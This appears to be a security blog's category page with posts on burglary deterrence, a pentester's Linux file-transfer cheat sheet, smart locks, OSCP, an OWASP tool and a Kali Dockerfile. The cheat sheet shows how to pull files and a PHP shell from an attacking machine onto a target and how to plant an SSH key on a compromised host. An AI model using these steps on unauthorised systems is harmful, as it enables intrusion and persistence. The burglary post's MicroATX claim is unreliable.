Skip to content

Category: Security

Why Time Is Of The Essence In Security Matters

Keeping your home safe is the priority of every homeowner. However, when it comes to safety, you need to understand what you are up against. A lot of households use deterrents such as stickers warning against the dog or the CCTV camera. Do these work in the long term? Inexperienced burglars may be fooled by the presence of a warning sticker, even if you have no guard dog or security camera. However, seasoned criminals take their time to observe and understand your routines. You can bet that they will soon find out about your imaginary dog and learn to ignore the warning notes. 

Real security systems and tips are essential to protect your loved ones and your belongings. The average burglar needs less than a minute to find access to your home. It takes about 10 minutes for them to get in, find your valuables, and exit the house. Therefore, you need to make time a priority.

Real-time CCTV & sensor

It’s a no-brainer. If you’re going to keep burglars away, you need a real CCTV system. Stickers warning about the imaginary security camera are unlikely to deter anyone for long. There are many types of CCTV systems. But experts recommend a solution that can in real-time monitor sensors and make all data — sensor-related and visual information — accessible to the relevant authorities and users. Some security systems can struggle with real-time information transmission; that’s precisely why you want to invest in a CCTV solution with a MicroATX motherboard — a clever piece of tech that enables data transfer and reading at the time of happening. Paired with sensors, you can make sure you know about suspicious broken glass or motion in and around the house when you’re away. 

Picking a lock is a sport

You may not realize it, but most burglars can follow existing tutorials to learn their lock-picking skills. Indeed, locksport is a real activity that consists in picking a lock in the shortest amount of time. For professional lock manufacturers, it can be an insightful activity, revealing the weaknesses of their products and providing improvement tips. However, it also means that burglars can find access to lock-picking information too. It’s no wonder they need under 60 seconds to get inside your home! 

Would a smart lock stop unwanted intruders? Smart locks are tricky to disable mechanically, unlike traditional locks. A burglar would need to hack into your lock using computing knowledge, which can take longer. 

Make no mistakes

More often than not, a burglar doesn’t even need special skills to find their way into your home. Many former criminals warn homeowners against the risks of leaving their garage unlocked. Additionally, your backyard can become the perfect starting place. Families that choose to leave the backdoor open so the pets can come and go freely in and outside the garden could expose themselves to high risks. Lock all your doors and windows; you’d be surprised how quickly someone can gain access to your property then. 

Burglars are fast. They understand that they only have a limited time to get in and out of properties. As a result, the more time-consuming you make it for them to break in, the less likely they are to target your home.

Linux File Transfer Techniques

Digging through my pentesting notes from over the last few years, I pulled together various scrawled things on quick ways to transfer files from one place to another. Thought I’d share the reference here in case anyone finds it useful.

Note: Some of this may have been copy/pasted from various places — I don’t honestly remember. If you recognize something, let me know – I am happy to give credit where credit is due!

Simple Python HTTP Server

This is an easy way to set up a web-server. This command will make the entire folder, from where you issue the command, available on port 9999.

python -m SimpleHTTPServer 9999

Wget

You can download files from that running Pything server using wget like this:

wget 192.168.1.102:9999/file.txt

Curl

curl -O <http://192.168.0.101/file.txt>

Netcat

Another easy way to transfer files is by using netcat.

If you can’t have an interactive shell it might be risky to start listening on a port, since it could be that the attacking-machine is unable to connect. So you are left hanging and can’t do ctr-c because that will kill your session.

So instead you can connect from the target machine like this.

On attacking machine:

nc -lvp 4444 < file

On target machine:

nc 192.168.1.102 4444 > file

You can of course also do it the risky way, the other way around:

So on the victim-machine we run nc like this:

nc -lvp 3333 > enum.sh

And on the attacking machine we send the file like this:

nc 192.168.1.103 < enum.sh

I have sometimes received this error:

This is nc from the netcat-openbsd package. An alternative nc is available

I have just run this command instead:

nc -l 1234 > file.sh

Socat

Server receiving file:

server$ socat -u TCP-LISTEN:9876,reuseaddr OPEN:out.txt,creat && cat out.txt
client$ socat -u FILE:test.txt TCP:127.0.0.1:9876

Server sending file:

server$ socat -u FILE:test.dat TCP-LISTEN:9876,reuseaddr
client$ socat -u TCP:127.0.0.1:9876 OPEN:out.dat,creat

With php

echo "<?php file_put_contents('nameOfFile', fopen('<http://192.168.1.102/file>', 'r')); ?>" > down2.php

Ftp

If you have access to a ftp-client to can of course just use that. Remember, if you are uploading binaries you must use binary mode, otherwise the binary will become corrupted!!!

Tftp

On some rare machine we do not have access to nc and wget, or curl. But we might have access to tftp. Some versions of tftp are run interactively, like this:

$ tftp 192.168.0.101
tftp> get myfile.txt

If we can’t run it interactively, for whatever reason, we can do this trick:

tftp 191.168.0.101 <<< "get shell5555.php shell5555.php"

SSH – SCP

If you manage to upload a reverse-shell and get access to the machine you might be able to enter using ssh. Which might give you a better shell and more stability, and all the other features of SSH. Like transferring files.

So, in the /home/user directory you can find the hidden .ssh files by typing ls -la.Then you need to do two things.

Create a new keypair

You do that with:

ssh-keygen -t rsa -C "your_email@example.com"

then you enter a name for the key.

Enter file in which to save the key (/root/.ssh/id_rsa): nameOfMyKeyEnter passphrase (empty for no passphrase):Enter same passphrase again:

This will create two files, one called nameOfMyKey and another called nameOfMyKey_pub. The one with the _pub is of course your public key. And the other key is your private.

Add your public key to authorized_keys

Now you copy the content of nameOfMyKey_pub.On the compromised machine you go to ~/.ssh and then run add the public key to the file authorized_keys. Like this

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQqlhJKYtL/r9655iwp5TiUM9Khp2DJtsJVW3t5qU765wR5Ni+ALEZYwqxHPNYS/kZ4Vdv..." > authorized_keys

Log in

Now you should be all set to log in using your private key. Like this

ssh -i nameOfMyKey kim@192.168.1.103

SCP

Now we can copy files to a machine using scp

# Copy a file:
scp /path/to/source/file.ext username@192.168.1.101:/path/to/destination/file.ext

# Copy a directory:
scp -r /path/to/source/dir username@192.168.1.101:/path/to/destination

“Smart” Door Lock Drilled Open in 4 Seconds

The most striking (you locksmiths will get that joke) thing about this is that an expensive “smart” lock was made with little to no physical security features in mind. I like how the article points out the difficulty of physically compromising a good-ole-fashioned steel, “dumb” mortise lock.

Is it true that “smart” lock manufacturers are forgetting about physical security when designing locks? Isn’t that the point of a lock?

Thoughts on OSCP being ‘outdated’

In recent weeks I have been reading comments online about the Penetration Testing with Kali Linux (PWK) course and OSCP exam taking a lot of flak for being “tool old” and using “outdated exploits that don’t even work anymore.”

I believe most of these comments are directed at the lab environment and course materials. It is true that you won’t find many systems in modern pentesting engagements that are exploitable with older things such as EternalBlue (MS17-010).

But that is beside the point.

The PWK and OSCP exam are all about teaching you how to think, solve problems, persevere, and develop a pentesting methodology that works for you.

It is true that Hack The Box (HTB) and other modern online capture-the-flag frameworks are more leading-edge in that regard, which is great, and they can certainly be an excellent way to augment and prepare for the PWK/OSCP journey.

But the point is that it really doesn’t matter if you drive a 2019 Ferrari 488 Spider or a 1996 Honda Accord, it is whether or not you figure out how to get to the destination.

OWASP Attack Surface Detector Project

When I did a short work stint at Secure Decisions in 2018, one of the projects I got to work on was helping to create the Attack Surface Detector plugin for ZAP and Burp Suite. I left that position before the project got published, but I am happy to see that it was a success.

Here it is in all its glory.

From the OWASP description:

The Attack Surface Detector tool uncovers the endpoints of a web application, the parameters these endpoints accept, and the data type of those parameters. This includes the unlinked endpoints a spider won’t find in client-side code, or optional parameters totally unused in client-side code. It also has the capability to calculate the changes in attack surface between two versions of an application.

There is a video that demonstrates the plugin, and yes, that is me doing the voice-over.

Kali Linux Dockerfile

Since recently discovering there is now an official Kali Linux docker image, I’ve been fiddling with it and tweaking my own setup to get it to how I like it for the things I use it for. I have a work version and a personal version. What follows is my personal version, used mostly for R&D, CTF challenges, and bug hunting in my free time.

My Kali Dockerfile (for Mac)

# The Kali linux base image
FROM kalilinux/kali-linux-docker

# Update all the things, then install my personal faves
RUN apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y && apt-get install -y \
 cadaver \
 dirb \
 exploitdb \
 exploitdb-bin-sploits \
 git \
 gdb \
 gobuster \
 hashcat \
 hydra \
 man-db \
 medusa \
 minicom \
 nasm \
 nikto \
 nmap \
 sqlmap \
 sslscan \
 webshells \
 wpscan \
 wordlists 

# Create known_hosts for git cloning things I want
RUN mkdir /root/.ssh
RUN touch /root/.ssh/known_hosts
# Add host keys
RUN ssh-keyscan bitbucket.org >> /root/.ssh/known_hosts
RUN ssh-keyscan github.com >> /root/.ssh/known_hosts

# Clone git repos
RUN git clone https://github.com/danielmiessler/SecLists.git /opt/seclists
RUN git clone https://github.com/PowerShellMafia/PowerSploit.git /opt/powersploit
RUN git clone https://github.com/hashcat/hashcat /opt/hashcat
RUN git clone https://github.com/rebootuser/LinEnum /opt/linenum
RUN git clone https://github.com/maurosoria/dirsearch /opt/dirsearch
RUN git clone https://github.com/sdushantha/sherlock.git /opt/sherlock

# Other installs of things I need
RUN apt-get install -y \
    python-pip

RUN pip install pwntools

# Update ENV
ENV PATH=$PATH:/opt/powersploit
ENV PATH=$PATH:/opt/hashcat
ENV PATH=$PATH:/opt/dirsearch
ENV PATH=$PATH:/opt/sherlock

# Set entrypoint and working directory (Mac specific)
WORKDIR /Users/wchatham/kali/

# Expose ports 80 and 443
EXPOSE 80/tcp 443/tcp

Build it

docker build -t yourname/imagename path/to/theDockerfile 

(don’t actually put ‘Dockerfile’ in the path). Do change ‘imagename’ to something apropos, such as ‘kali’

Run it

docker run -ti -p 80:80 -p 443:443 -v /Users/yourname/Desktop:/root yourname/imagename

The above examples require you to replace ‘yourname’ with your Mac username

-ti
Indicates that we want a tty and to keep STDIN open for interactive processes

-p
Expose the listed ports

-v
Mount the defined folders to be shared from host to docker.

Hope that’s useful to someone!

Hat tip: https://www.pentestpartners.com/security-blog/docker-for-hackers-a-pen-testers-guide/